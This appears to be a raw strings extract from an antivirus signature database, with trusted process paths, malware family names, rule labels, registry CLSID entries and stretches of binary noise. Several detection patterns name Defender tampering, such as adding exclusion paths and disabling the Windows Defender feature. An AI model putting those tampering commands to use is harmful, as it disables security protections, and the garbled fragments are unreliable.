?%userprofile%\\appdata\\local\\vivaldidev\\application\\vivaldi.exe %userprofile%\\appdata\\local\\yandex\\yandexbrowser\\application\\browser.exe I%userprofile%\\appdata\\local\\yandex\\yandexbrowser\\application\\browser.exe %userprofile%\\appdata\\local\\yesware\\yesware for outlook\\yeswareshadow\\yeswarechromium.exe Z%userprofile%\\appdata\\local\\yesware\\yesware for outlook\\yeswareshadow\\yeswarechromium.exe %userprofile%\\appdata\\local\\yesware\\yesware for outlook\\yeswareshadow\\yeswarechromiumx64.exe ]%userprofile%\\appdata\\local\\yesware\\yesware for outlook\\yeswareshadow\\yeswarechromiumx64.exe %userprofile%\\appdata\\locallow\\copitrak\\tstpfltk.exe 5%userprofile%\\appdata\\locallow\\copitrak\\tstpfltk.exe %userprofile%\\appdata\\roaming\\360se6\\application\\360se.exe ;%userprofile%\\appdata\\roaming\\360se6\\application\\360se.exe %userprofile%\\appdata\\roaming\\icrm\\desktop connection for sap crm\\bin\\appdiag.exe R%userprofile%\\appdata\\roaming\\icrm\\desktop connection for sap crm\\bin\\appdiag.exe %userprofile%\\appdata\\roaming\\infoslipsforme\\infoslips.viewer.exe B%userprofile%\\appdata\\roaming\\infoslipsforme\\infoslips.viewer.exe %userprofile%\\appdata\\roaming\\microsoft\\addins /%userprofile%\\appdata\\roaming\\microsoft\\addins %userprofile%\\appdata\\roaming\\onetastic\\onecal.exe 3%userprofile%\\appdata\\roaming\\onetastic\\onecal.exe %userprofile%\\appdata\\roaming\\oracle\\crm ondemand desktop\\bin\\appdiag.exe J%userprofile%\\appdata\\roaming\\oracle\\crm ondemand desktop\\bin\\appdiag.exe %userprofile%\\appdata\\roaming\\oracle\\oracle sales cloud for outlook\\bin\\appdiag.exe T%userprofile%\\appdata\\roaming\\oracle\\oracle sales cloud for outlook\\bin\\appdiag.exe %userprofile%\\appdata\\roaming\\vision\\updater.exe 1%userprofile%\\appdata\\roaming\\vision\\updater.exe %userprofile%\\appdata\\roaming\\watchdox\\windows plugin\\pdflauncher.exe F%userprofile%\\appdata\\roaming\\watchdox\\windows plugin\\pdflauncher.exe %userprofile%\\appdata\\roaming\\webex\\applications\\ptupdate.exe >%userprofile%\\appdata\\roaming\\webex\\applications\\ptupdate.exe %userprofile%\\appdata\\roaming\\zoom\\bin\\zoom.exe 0%userprofile%\\appdata\\roaming\\zoom\\bin\\zoom.exe %userprofile%\\appdata\\roaming\\zoom\\bin_00\\zoom.exe 3%userprofile%\\appdata\\roaming\\zoom\\bin_00\\zoom.exe %programdata%\\webex %systemdrive%\\apps\\notes\\notes.exe #%systemdrive%\\apps\\notes\\notes.exe %systemdrive%\\axpointaddin\\eowp.exe $%systemdrive%\\axpointaddin\\eowp.exe %systemdrive%\\gendox\\teams\\common\\bin &%systemdrive%\\gendox\\teams\\common\\bin %systemdrive%\\lotus\\notes\\notes.exe $%systemdrive%\\lotus\\notes\\notes.exe %systemdrive%\\notes\\notes.exe %windir%\\explorer.exe %windir%\\hh.exe %windir%\\microsoft.net\\framework !%windir%\\microsoft.net\\framework %windir%\\microsoft.net\\framework64 #%windir%\\microsoft.net\\framework64 %windir%\\notepad.exe %windir%\\system32\\bdeunlock.exe %windir%\\system32\\bdeunlock.exe %windir%\\system32\\bucappnt.exe %windir%\\system32\\bumappnt.exe %windir%\\system32\\bupappnt.exe %windir%\\system32\\conhost.exe %windir%\\system32\\ctfmon.exe %windir%\\system32\\dwwin.exe %windir%\\system32\\eventvwr.exe %windir%\\system32\\fondue.exe %windir%\\system32\\fontview.exe %windir%\\system32\\igfxem.exe %windir%\\system32\\igfxhk.exe %windir%\\system32\\igfxtray.exe %windir%\\system32\\ime %windir%\\system32\\microsoft.uev.synccontroller.exe 3%windir%\\system32\\microsoft.uev.synccontroller.exe %windir%\\system32\\mspaint.exe %windir%\\system32\\notepad.exe %windir%\\system32\\prevhost.exe %windir%\\system32\\rmactivate.exe !%windir%\\system32\\rmactivate.exe %windir%\\system32\\runtimebroker.exe $%windir%\\system32\\runtimebroker.exe %windir%\\system32\\spool\\drivers %windir%\\system32\\spool\\drivers %windir%\\system32\\tokenbrokercookies.exe )%windir%\\system32\\tokenbrokercookies.exe %windir%\\system32\\verclsid.exe %windir%\\system32\\werfault.exe %windir%\\system32\\wermgr.exe %windir%\\system32\\wevtutil.exe %windir%\\system32\\wfs.exe %windir%\\system32\\wisptis.exe %windir%\\system32\\xpsrchvw.exe %windir%\\system32\\cmtrace.exe %windir%\\systemapps\\*\\microsoftedgecp.exe *%windir%\\systemapps\\*\\microsoftedgecp.exe %windir%\\syswow64\\colorcpl.exe %windir%\\syswow64\\ctfmon.exe %windir%\\syswow64\\dwwin.exe %windir%\\syswow64\\eventvwr.exe %windir%\\syswow64\\explorer.exe %windir%\\syswow64\\fondue.exe %windir%\\syswow64\\fontview.exe %windir%\\syswow64\\ime %windir%\\syswow64\\macromed\\flash\\flashplayerupdateservice.exe >%windir%\\syswow64\\macromed\\flash\\flashplayerupdateservice.exe %windir%\\syswow64\\mspaint.exe %windir%\\syswow64\\notepad.exe %windir%\\syswow64\\prevhost.exe %windir%\\syswow64\\rmactivate.exe !%windir%\\syswow64\\rmactivate.exe %windir%\\syswow64\\spool\\drivers %windir%\\syswow64\\spool\\drivers %windir%\\syswow64\\verclsid.exe %windir%\\syswow64\\werfault.exe %windir%\\syswow64\\wermgr.exe %windir%\\syswow64\\xpsrchvw.exe %windir%\\winsxs\\*\\iexplore.exe %windir%\\winsxs\\*\\splwow64.exe b((windowsapps\\\\[^\\\\]+\\\\)|(microsoft office\\\\(root\\\\)?))office..\\\\[^\\.]+\\.exe\\\"?[^\\\"]+\\\"([^\\\"]+)\\\"z !#SLF:LanchAfterDropBySystemDL !#SLF:SystemDropUnsignedDL \t!#SLF:SystemDropUnsignedDLObMpAttributes RDPSettings UA=([%d]+);SL=([%d]+) HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services >HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services UserAuthentication HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp JHKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp SecurityLayer 25b32647191d GenericSystemWinlogon 15b3a6addbb7 *DCO_MpDisableScanReparsePointsOfflineFiles [3*DCO_MpDisableScanReparsePointsOfflineFiles VmProcessProtectiont ?(1,0),%system%\\mptest_82dd78f6-8040-42f6-8782-de38fb81001e.exe*(0,0xffffffffffffffff),%system%\\csrss.exe*(0,0xffffffffffffffff),%system%\\lsass.exe (0,-1),%system%\\winlogon.exez .*Win32/Xiazai.* .*Win32/Xeelyak.* .*MSIL/Solorigate.* !#BM_VulnWerfaultSecure 0 WerFaultSecure.exe was started. Secure mode = %d EncryptDumpStream 25b36a253424 25b3752175c5 8bb35d817f3d \\schtasks.exe 93b3282b8218 93b39c9ea06d 527885de44e1 WerFaultSecure.exe WerFaultSecure Windows Fault Reporting get_fixedversioninfo shr64 SetOriginalFileName VulnWerFaultSecureExe.exe !#Lua:SusPathExec |.exe|.scr|.cpl|.bat|.com|.cmd|.pif|.ps1|.vbs| /|.exe|.scr|.cpl|.bat|.com|.cmd|.pif|.ps1|.vbs| :\\recycle :\\$.recycle.bin Lua:NewAutoExec.AA \\syswow64 Lua:NewAutoExec.BA %PROGRAMFILES% \\common files (x86)\\common files Lua:NewAutoExec.CA %TEMP% Lua:NewAutoExec.DA \\appdata \t\\appdata Lua:NewAutoExec.EA Lua:NewAutoExec.EAz !#SCRIPT:AddExclusionPaths \"add-mppreference exclusionpath !#SCRIPT:GetExclusionPaths get-mppreference \"get-mppreference !#SCRIPT:RemExclusionPaths remove-mppreference %remove-mppreference !#SCRIPT:AddExclusionProcess %add-mppreference exclusionprocess !#SCRIPT:GetExclusionProcess %get-mppreference !#SCRIPT:RemExclusionProcess (remove-mppreference !#SCRIPT:AddExclusionExtension 'add-mppreference exclusionextension !#SCRIPT:GetExclusionExtension 'get-mppreference !#SCRIPT:RemExclusionExtension *remove-mppreference %!#SCRIPT:MpTamperAmsiExcludeDrivePath )U%!#SCRIPT:MpTamperAmsiExcludeDrivePath add-mppreference-exclusionpath %add-mppreference-exclusionpath !!#SCRIPT:PsDisableDefenderFeature )_!!#SCRIPT:PsDisableDefenderFeature disable-windowsoptionalfeature 3disable-windowsoptionalfeature @windows-defender $!#SCRIPT:PsDisableDefenderSubFeature )c$!#SCRIPT:PsDisableDefenderSubFeature 4disable-windowsoptionalfeature @windows-defender- ,!#ALF:VirTool:PowerShell/MpQueryExclusions.B )p,!#ALF:VirTool:PowerShell/MpQueryExclusions.B get-childitem 9get-childitem @\\microsoft\\windowsdefender @exclusions !#MpIsSENSEScan SCANSOURCE_SENSE !#MpIsSENSEScanPE 76b32985ed5c SECURITY_MANDATORY_HIGH_RID !#TEL:Lua:SENSEDownloadLocalLow !#TEL:Lua:SENSEDownloadLocalLowObMpAttributes `|z]h roc![ .e?hCJ gL{* |xKSQ N2NKU SA{+ iBLx[t ZOt=' 9D\\iA ,| !e )/A@ qy15I ,wNQUv J!;*L 6L'GB$ zJ-'a lyO%F \\\",-MP (uA*6 P>lK3 p\"Cop T6Kf\t qK1gH3 #aR6Q .*?KN= %o?AZ GZeoI RY<pl. B ^&r !ks3 / Ph\".^ %,qI*Hyn &H X&G- u]ybd \\Oh)ch \\Oh)chW4 m8_;YI 8q?LG-C6 7>y:C PRQ6' +vYDs_ E7?eg 4\tASC ]2QD~ O9c K b7R@bt`x B<cAl CnT l V>#dO? 3 %z.0p eKsL< d8bj] LF l&n ]y 07A B([1B] \\z9/yg P Zwc 9~)@^ 1!|rx DCVJ] !#ALF:Trojan:Win32/BerBioos.A !#ALF:Trojan:Win64/Reductor.B !#PUA:Block:RelevantKnowledge !#SIGATTR:PWS:Win32/Jauxeer.B !#SIGATTR:Win32/FileException !#SIGATTR:Win32/FileException'0 !#SIGATTR:JS/Obfuscator.Php.A !#SIGATTR:JS/Obfuscator.Php.A R !#SIGATTR:MPK !#//JAVATTR:JavaObsubstringappendintegerdecode !#//JAVATTR:JavaObsubstringappendintegerdecode P- U& P- [#/*s 0u\\1 0u\\1 @ !#ALF:JASYP:TrojanDownloader:Win32/Ymacco!atmn !#SIGATTR:TrojanDownloader:Win32/Banload.gen!W 2Jbv# 02Jbv# 02Jbv#@ !#ALF:SIGA:TrojanDownloader:MSIL/Genmaldow.S11 ;`q5@ !#ALF:VirTool:MSIL/GenerateSharpPELoader.B!MTB !#ALF:VirTool:MSIL/NamedPipeServerHelper.A!MTB !#SIGATTR:Possible_Injector_v2 !#SIGATTR:Possible_Injector_v2Q !#ALF:Meterpreter.ConnectAlloc K0 M !#ALF:Trojan:Win32/Qbot.ZY!MTB !#SIGATTR:PWS:Win32/Ldpinch.BD !AGroup:CreateProcess_WinProcs !#SIGATTR:JS/Obfuscator.Ping.A !#SIGATTR:JS/Obfuscator.Ping.A R !#ATTRIBUTE:SIGA:MSIL:EMAIL:S1 !#SIGATTR:SetWinStateForm!msil !#SIGATTR:VideoWmiCaption!msil r` m` !#SLFPER:MSIL/AsmblyLoadInvoke !#SLFPER:MSIL/AsmblyLoadInvoke!(` !#SIGATTR:Ladivyrop.Woyaohuchi !#ALF:JASYP:TrojanDownloader:Win32/Banload!atmn !#//SIGATTR:Java.allPermissions PA%oL !#ALF:JASYP:PWS:Win32/Lmir!atmn !#ALF:Trojan:Win32/Delf.CEE!MTB !#ALF:Trojan:Win32/Mikey.KA!MTB !#ALFPER:Backdoor:Win32/Lojax.A !#SIGATTR:Worm:Win32/Autorun.HI !#SIGATTR:Worm:Win32/Autorun.HIL0 !#Trojan:Win32/AgentBypass.genL 0(070@ !#Trojan:Win32/Malex.gen!attr.D !#ALF:Trojan:MSIL/Androm.OE!MTB #q<{Emn !#ALF:Trojan:MSIL/Crysan.PA!MTB }A;M r` }A;M !#ALF:Trojan:MSIL/Zenpak.RB!MTB !#ALF:VirTool:MSIL/Gopher.A!MTB !#SIGATTR:MSIL/CryptInject.AR96 `\" M: !#SIGATTR:Win32/AVEVASION.B!MTB !#SLFPER:MSIL/PsBypassLogging.A yY5j*@ !#MPTEST-AGG-20 0 QmB 0 QmB !#SIG:Miuref.Q1 !#SIGATTR:TrojanDownloader:Win32/Maldldr.gen!C.1 !#SIGATTR:Win32/InstallCore.ReadOwnProcessMemory !#ATTRIBUTE:SIGA:MISL:PossibleCopyToRemovalbe:S1 !#ATTRIBUTE:SIGA:MSIL:SymmetricAlgo:Rijndael.S01 o`/`kI !#SIGATTR:Worm:Win32/CopyItselfAndRegister!LowFi !#ALF:Trojan:Win32/Ekstak.AA!MTB !#ALF:Trojan:Win32/Fareit.RF!MTB !#SIGATTR:Backdoor:Win32/Zacom.B h0 7WN !#SIGATTR:Dialer:Win32/Adialer.F DE0 [ (070@ !#SIGATTR:Dialer:Win32/Adialer.G !#SIGATTR:Dialer:Win32/Adialer.G 0 !#SIGATTR:Trojan:Win32/Ubexado.A !#SIGATTR:Trojan:Win32/Ubexado.Ak0 !#TEL:Trojan:Win32/Eggnog.SM!MTB !#ALF:HackTool:MSIL/Watson.B!MTB !#ALF:Trojan:MSIL/Azorult.AC!MTB !#ALF:Trojan:MSIL/Stealer.FE!MTB !#ALF:VirTool:MSIL/RunasCS.A!MTB by) r` by) !#SIGA:TrojanSpy:MSIL/Stealer.S1 !#SIGATTR:MSIL/AgentTesla.AP!MTB !#Sigattr:MSIL/AgentTesla.ND!MTB f)a o` !#SIG:Yesudac.C1 0$=AU !#//SIGATTR:Java.processClassPath !#ALF:JASYP:Worm:Win32/Bagle!atmn !#ALF:JASYP:Worm:Win32/Sfone!atmn !#SIGATTR:Backdoor:Win32/Cycbot.G h0 7WN !#SIGATTR:Trojan:Win32/Zapchast.H !#SIGATTR:Trojan:Win32/Zapchast.HJ0 !#SIGATTR:Worm:Win32/Fasong.H.dll !#SIGATTR:Worm:Win32/Fasong.H.dll 0 i 7 !#ALF:MSIL/NtProtectMarshalCopy.A !#ALF:VirTool:MSIL/PELoader.B!MTB !#Wkysol:do_exhaustivehstr_rescan @T#m%d @T#m%d70 !#ALFPER:SIG:ElexBrowserToolbar.A ^w%Wa` !#SIG:Frosparf.I1 *=Z[@ !#SIG:Hicrazyk.D1 !#SIGATTR:vmmgrow K0J0\t ?{ 0 !#MustEmulateTest !#ALF:JASYP:PWS:Win32/QQThief!atmn !#ALF:JASYP:Trojan:Win32/Mira!atmn [#'@> !#ALF:JASYP:Worm:Win32/Fasong!atmn 0%#39 !#ALF:JASYP:Worm:Win32/Mydoom!atmn !#ALF:JASYP:Worm:Win32/Vobfus!atmn !#SIGATTR:Trojan:Win32/Busky.gen!C !#SIGATTR:Trojan:Win32/Busky.gen!C 0 !#SIGATTR:Trojan:Win32/C2Lop.gen!G !#SIGATTR:Trojan:Win32/C2Lop.gen!GJ0 !#SIGATTR:Trojan:Win32/Kill_Others !#SIGATTR:Trojan:Win32/Kill_OthersA0 !#SIGATTR:Worm:Win32/IRCBotInstall !#SIGATTR:deepemu_febipos_obsidium !#ALF:VirTool:MSIL/SharpClip.A!MTB !#SIGATTR:VirTool:MSIL/Injector.HM !#SIGATTR:VirTool:MSIL/Injector.HS !#SIGATTR:VirTool:MSIL/Injector.IA !#SIGATTR:VirTool:MSIL/Injector.IC a ! z; a ! z; !#SIGATTR:VirTool:MSIL/Injector.IS !#SIGATTR:VirTool:MSIL/Injector.IV !#SIGATTR:Gifuz.A1 !#//JAVATTR:JavaObcryptoatsomepoint !#//JAVATTR:JavaObsubstringparseint !#//JAVATTR:JavaObsubstringparseint !#ALF:JASYP:Ransom:Win32/Locky!atmn !#ALF:JASYP:Trojan:Win32/C2Lop!atmn !#ALF:JASYP:Trojan:Win32/Vundo!atmn !#ALF:JASYP:Worm:Win32/AutoRun!atmn 32\\quartz.dll <CLSID\\{E436EBB8-524F-11ce-9F53-0020AF0BA770}\\InprocServer32 <CLSID\\{FEB50740-7BEF-11ce-9BD9-0000E202599C}\\InProcServer32 <clsid\\{068b0700-718c-11d0-8b1a-00a0c91bc90e}\\inprocserver32 >C:\\WINDOWS\\system32\\msconf.dll <clsid\\{25336921-03f9-11cf-8fd0-00aa00686f13}\\inprocserver32 >c:\\windows\\system32\\mshtml.dll <clsid\\{32b533bb-edae-11d0-bd5a-00aa00b92af1}\\inprocserver32 >C:\\WINDOWS\\system32\\urlmon.dll <clsid\\{32da2b15-cfed-11d1-b747-00c04fc2b085}\\inprocserver32 <clsid\\{33facfe0-a9be-11d0-a520-00a0d10129c0}\\inprocserver32 <clsid\\{418afb70-f8b8-11ce-aac6-0020af0b99a3}\\inprocserver32 <clsid\\{4662daa9-d393-11d0-9a56-00c04fb68bf7}\\inprocserver32 >c:\\windows\\System32\\itircl.dll <clsid\\{4662dab0-d393-11d0-9a56-00c04fb68b66}\\inprocserver32 >C:\\WINDOWS\\system32\\hhctrl.ocx <clsid\\{4a7ded0a-ad25-11d0-98a8-0800361b1103}\\inprocserver32 >c:\\windows\\system32\\mydocs.dll <clsid\\{50b6327f-afd1-11d2-9cb9-0000f87a369e}\\inprocserver32 >C:\\Windows\\System32\\adsldp.dll <clsid\\{59ce6880-acf8-11cf-b56e-0080c7c4b68a}\\inprocserver32 <clsid\\{60254ca5-953b-11cf-8c96-00aa00b8708c}\\inprocserver32 >C:\\Windows\\system32\\wshext.dll <clsid\\{607fd4e8-0a03-11d1-ab1d-00c04fc9b304}\\inprocserver32 <clsid\\{6bc096d5-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 <clsid\\{6bc09896-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 >C:\\WINDOWS\\system32\\iassam.dll <clsid\\{6bc09897-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 <clsid\\{6bc09898-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 <clsid\\{6bc098a6-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 <clsid\\{6bc098a7-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 <clsid\\{79376820-07d0-11cf-a24d-0020afd79767}\\inprocserver32 <clsid\\{79eac9e0-baf9-11ce-8c82-00aa004ba90b}\\inprocserver32 <clsid\\{79eac9e3-baf9-11ce-8c82-00aa004ba90b}\\inprocserver32 <clsid\\{79eac9e6-baf9-11ce-8c82-00aa004ba90b}\\inprocserver32 <clsid\\{79eac9e7-baf9-11ce-8c82-00aa004ba90b}\\inprocserver32 <clsid\\{79eac9f1-baf9-11ce-8c82-00aa004ba90b}\\inprocserver32 <clsid\\{79eac9f2-baf9-11ce-8c82-00aa004ba90b}\\inprocserver32 <clsid\\{7b8a2d94-0ac9-11d1-896c-00c04fb6bfc4}\\inprocserver32 <clsid\\{7e3fcea1-31b4-11d2-ae1f-0080c7337ea1}\\inprocserver32 >c:\\windows\\system32\\msxml3.dll <clsid\\{85131630-480c-11d2-b1f9-00c04f86c324}\\inprocserver32 <clsid\\{94abaf2a-892a-11d1-bbc4-00a0c90640bf}\\inprocserver32 >C:\\WINDOWS\\system32\\devmgr.dll <clsid\\{99847c33-b1b4-11d1-8f10-00c04fc2c17b}\\inprocserver32 >C:\\WINDOWS\\system32\\comuid.dll <clsid\\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}\\inprocserver32 <clsid\\{aeb84c83-95dc-11d0-b7fc-b61140119c4a}\\inprocserver32 >C:\\WINDOWS\\system32\\dmview.ocx <clsid\\{bacf5c8a-a3c7-11d1-a760-00c04fb9603f}\\inprocserver32 >C:\\WINDOWS\\system32\\appmgr.dll <clsid\\{ea502722-a23d-11d1-a7d3-0000f87571e3}\\inprocserver32 >c:\\windows\\System32\\GPEdit.dll @CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\shell\\find\\command 6@%systemroot%\\explorer.exe Fclsid\\{4662daac-d393-11d0-9a56-00c04fb68bf7}\\versionindependentprogid *ITIR.LocalGroupArray software\\microsoft\\mediaplayer installation directoryLC:\\Program Files\\Windows Media Player 4software\\classes\\cdo.ss_nntponpostearlysink.1\\clsid N{CD000012-8B95-11D1-82DB-00C04BF1625D} BSOFTWARE\\classes\\Interface\\{00000135-0000-0000-c000-000000000046} 2IInterfaceFromWindowProp Esoftware\\classes\\clsid\\{fd8d3a5f-6066-11d1-8c13-00c04fd8d503}\\progid ,MSExtOrganizationUnit crlfile\\shell\\add\\command %SystemRoot%\\system32\\rundll32.exe cryptext.dll,CryptExtAddCRL %1 4clsid\\{16b280c8-ee70-11d1-9066-00c04fd9189d}\\progid PDXImageTransform.Microsoft.BasicImage.1 4clsid\\{adc6cb86-424c-11d2-952a-00c04fa34f05}\\progid PDXImageTransform.Microsoft.DropShadow.1 5CLSID\\{13709620-C279-11CE-A49E-444553540000}\\TypeLib N{50a7e9b0-70ef-11d1-b75a-00a0c90564fe} 5CLSID\\{289228de-a31e-11d1-a19c-0000f875b132}\\TypeLib N{3D5905E0-523C-11D1-9FEA-00600832DB4A} 5clsid\\{32da2b15-cfed-11d1-b747-00c04fc2b085}\\typelib N{420B2830-E718-11CF-893D-00A0C9054228} 5clsid\\{334857cc-f934-11d2-ba96-00c04fb6d0d1}\\typelib N{97d25db0-0363-11cf-abc4-02608c9e7553} 5clsid\\{54af9350-1923-11d3-9ca4-00c04f72c514}\\typelib N{54AF9343-1923-11D3-9CA4-00C04F72C514} 5clsid\\{66182ec4-afd1-11d2-9cb9-0000f87a369e}\\typelib 5clsid\\{c47195ec-cd7a-11d1-8ea3-00c04f9900d7}\\typelib <CLSID\\{0002DF01-0000-0000-C000-000000000046}\\InprocServer32 @C:\\Windows\\system32\\shdocvw.dll <CLSID\\{00C429C0-0BA9-11d2-A484-00C04F8EFB69}\\InprocServer32 @c:\\windows\\system32\\dxtmsft.dll <CLSID\\{01458CF0-A1A2-11D1-8F85-00600895E7D5}\\InprocServer32 @c:\\windows\\system32\\msdtctm.dll <CLSID\\{13709620-C279-11CE-A49E-444553540000}\\InProcServer32 @c:\\windows\\system32\\shell32.dll <CLSID\\{1E54333B-2A00-11d1-8198-0000F87557DB}\\InprocServer32 @C:\\Windows\\System32\\Dxtmsft.dll <CLSID\\{3050F4CF-98B5-11CF-BB82-00AA00BDCE0B}\\InProcServer32 @C:\\WINDOWS\\system32\\iepeers.dll <CLSID\\{3AE86B20-7BE8-11D1-ABE6-00A0C905F375}\\InprocServer32 @C:\\Windows\\System32\\mpg2splt.ax <CLSID\\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\\InprocServer32 @C:\\WINDOWS\\system32\\devenum.dll <CLSID\\{AFB6C280-2C41-11d3-8A60-0000F81E0E4A}\\InprocServer32 <CLSID\\{ECABAFC3-7F19-11D2-978E-0000F8757E2A}\\InprocServer32 @C:\\WINDOWS\\system32\\comsvcs.dll <CLSID\\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\\InprocServer32 @C:\\Windows\\system32\\jscript.dll <clsid\\{0afaced1-e828-11d1-9187-b532f1e9575d}\\inprocserver32 <clsid\\{2a005c11-a5de-11cf-9e66-00aa00a3f464}\\inprocserver32 <clsid\\{2b4f54b1-3d6d-11d0-8258-00c04fd5ae38}\\inprocserver32 @c:\\windows\\system32\\shdocvw.dll <clsid\\{30c3b080-30fb-11d0-b724-00aa006c1a01}\\inprocserver32 @c:\\windows\\system32\\imgutil.dll <clsid\\{33d9a761-90c8-11d0-bd43-00a0c911ce86}\\inprocserver32 <clsid\\{33d9a762-90c8-11d0-bd43-00a0c911ce86}\\inprocserver32 <clsid\\{34ab8e82-c27e-11d1-a6c0-00c04fb94f17}\\inprocserver32 @C:\\WINDOWS\\system32\\certmgr.dll <clsid\\{372fce38-4324-11d0-8810-00a0c903b83c}\\inprocserver32 @C:\\WINDOWS\\system32\\certcli.dll <clsid\\{3bbe95fb-c53f-11d1-b3a2-00a0c9083365}\\inprocserver32 @C:\\WINDOWS\\system32\\msdtctm.dll <clsid\\{3fc0b520-68a9-11d0-8d77-00c04fd70822}\\inprocserver32 <clsid\\{410381db-af42-11d1-8f10-00c04fc2c17b}\\inprocserver32 @C:\\WINDOWS\\system32\\comsnap.dll <clsid\\{424b71af-0695-11d2-a484-00c04f8efb69}\\inprocserver32 <clsid\\{4315d437-5b8c-11d0-bd3b-00a0c911ce86}\\inprocserver32 <clsid\\{450d8fba-ad25-11d0-98a8-0800361b1103}\\inprocserver32 <clsid\\{4657278a-411b-11d2-839a-00c04fd918d0}\\inprocserver32 <clsid\\{4c4a5e40-732c-11d0-8816-00a0c903b83c}\\inprocserver32 <clsid\\{4ccea634-fbe0-11d1-906a-00c04fd9189d}\\inprocserver32 @C:\\WINDOWS\\system32\\dxtmsft.dll <clsid\\{4ddb6d36-3bc1-11d2-86f2-006008b0e5d2}\\inprocserver32 @C:\\WINDOWS\\system32\\wavemsp.dll <clsid\\{4fd2a832-86c8-11d0-8fca-00c04fd9189d}\\inprocserver32 @C:\\WINDOWS\\system32\\ddrawex.dll 5AhKy )ft\\SF bUIZZ &- aJ dF<92 ]/4{R kLTBz j2\\lR ,2S3J: t!HTN O|k4+` '5>e%, L:P$= ~x-%1C z\\G,.L UlZ`b DgY\\n+E' 8l*6#}? sFY_Y ]}Gb,p 'F?^e) G&>,W 9a'tG cu*fH {F{H^ $`;UET w^H&P 7lyJI 5(FCs *;8Jbx\\nZVO n nk8 p%F+|} hv]baK j6/rHJ ]{Zlj a4[,,k o[\tz7 S? RjJ t>nu[ UpxZ$l1 W6bj8A pnA8e Ho)SQ 39}YA8 3\tckR ^ZvJS TO0-G< ,Z9R+C NSG4} a|t4#H XhP-@ i\tzR. Xg}wI v8BQA -N \\. sJ!/c Kg3tNB 9I)>m t>3\tf 3,\"*9 ;J$X`C c^Quo zFl#v l}}|) -D<#X e ce}_$ mpattribute 12ae7831968286 HSTR:TrojanDownloader:Win32/Onkods_Lowfi )HSTR:TrojanDownloader:Win32/Onkods_Lowfi 367fa3dac669 70786b38e6d1 717855ac9a17 SIGATTR:DeleteMyAppExe SIGATTR:WRITESYSDIR 8f7855b294f9 HSTR:Trojan:Win32/Colisi ac781f5a9735 b07fbd738628 b8788d59d230 c17846e77279 c478b9dc9c64 e6783a59b874 11f78c101e858 12a610536e920 19541f345ae79 196785380bdd4 36878247e0651 7389b459a997 77b313d103ec %.ini$ 1d2980e90c3a 1d2980e90c3aIncludesResearchData 1197874711437 11e78839856e7 14778b52a2229 HSTR:TrojanDownloader:Win32/Krado.A $HSTR:TrojanDownloader:Win32/Krado.A 1a1785dbaf550 15b3135bcf57 15b3686bdaf8 \\windows defender\\msmpeng.exe 15b3b1af5db2 15b3cfb21399 1bb3df96ab4b 218965b94a2a 25b3bd15b206 35406042d2f1 lsass 49b36a1ad4c7 %d%d%d?%d?%d? 5178006dbd34 ae788f0f8e65 bb78df03205e 49780b465295 49780b465295Flags1 !#Lua:Mytonel.F1 !#Lua:Mytonel.F1ObMpAttributes \\pps-qq-19.exe 2989b47ba5ce 2a89b4ee54c2 3578f1ffdd5d 4978cd2bb9a3 527895c44054 746135b521bf 8778514d817f 8b780cde6b6d a4784e9cdc79 b078d9d42760 bd7817ec59ce bdd7666326d5 fc78fae57549 !#Lua:Vmhost.A \\updatetask\\vmhost.exe Lua:Vmhost.A !#ALF:Exploit:Script/CVE-2019-7238.A !#ALF:Exploit:Script/CVE-2019-7238.AObMpAttributes SCPT:CodeOnly.CVE-2019-7238 15b3894ac0be 15b38dc523be 125408c3481fc 12978f0ebf1a9 1318d6a467dfb PUA:Block:AMCleaner.B 135400df9da11 13540639e9f09 13540acc83d42 13540e88fe3a7 135614520e48f 13c8d7a804c74 PUA:Block:BackTrack.C 145402bddbe46 145407617610d 145408fac942d 14540b056f2f8 1554066b7cb33 15540e953d81c 15f8dd3f3b6dc PUA:Block:Genieo.C!xp 165400270fa44 1654007ed3918 1654075c406b4 16540909a02ce 16540f50d4252 16d8df843fe48 PUA:Block:AMCleaner.E 17278540e1c5d 1738d607bb4ee PUA:Block:AMCleaner.H 175408a749fe9 17540b358387f 17540f2561b45 17e8d15352b51 PUA:Block:VSearch!MTB 1854036d29845 195401d441a11 1a540238b0979 1a540334f72ea 1b0786563ca93 1b54039beae74 1c54003a91698 1c540a9a59dfd 1d540665516ba 1e54062bc6706 1e5408ebf1c34 1f278011b9a86 1f4619914f392 213784b37586a HSTR:JSUtilsFramework 2448dc628f42a PUA:Block:Genieo.B!xp 2ab785328da72 HSTR:IOAVDownloadAdmin 3b961d29aa2ce !#ALF:Trojan:Script/Typhon.G!dha SCPT:Typhon.G !#ALF:Trojan:Script/Scryper.A!dha SCPT:Scryper 1e29575536c4 ->(pdf 2e89e2cab250 4478f0a828fa 4789de07ede5 4a78f78faf57 4d89fa17e08a 4f78b832d2de 5078cf66536e 55787f0be04e 5578d38a8f5e 57780fbbeff3 5c8d5f60860e PUA:Block:Skypelogger.C 688d9161fdf4 PUA:Block:MacInformer.B 7178650dd034 727879b0f1f1 768d27516597 PUA:Block:InstallCore.A 788d14e97e3a PUA:Block:TuneupMyMac.B 78be48491055 8178d239f3ed yP!qBH#- $hxQOix g9;rc -&<!Z c&!<D| A\tX1W AeB j 9 [<< E.ld3M .XL.qhz &l/4Fm#B O&l/4Fm#B HjeMbb mTfKzs %q=1Et -o \\9 dD]X: #Dvkdt +Tx+s 0Wp^| A<\"8h @@S2ef] X{_2_| B.C)} m|j0G: v.}oS U 2B] T `n@ yRy9@ Au5e^ =l~-g <pMK} b*]) t2C~TX k(A|P e#R ;y V,\t#s D|.MFN {MsfIN yf;6~ )]M1V\t J_ S5 mYg3J ?$a2U 3`+v! [W/Up xTL.{ds nkQKB= nr}]',v k*[\\? }V`j. 58c#BRW 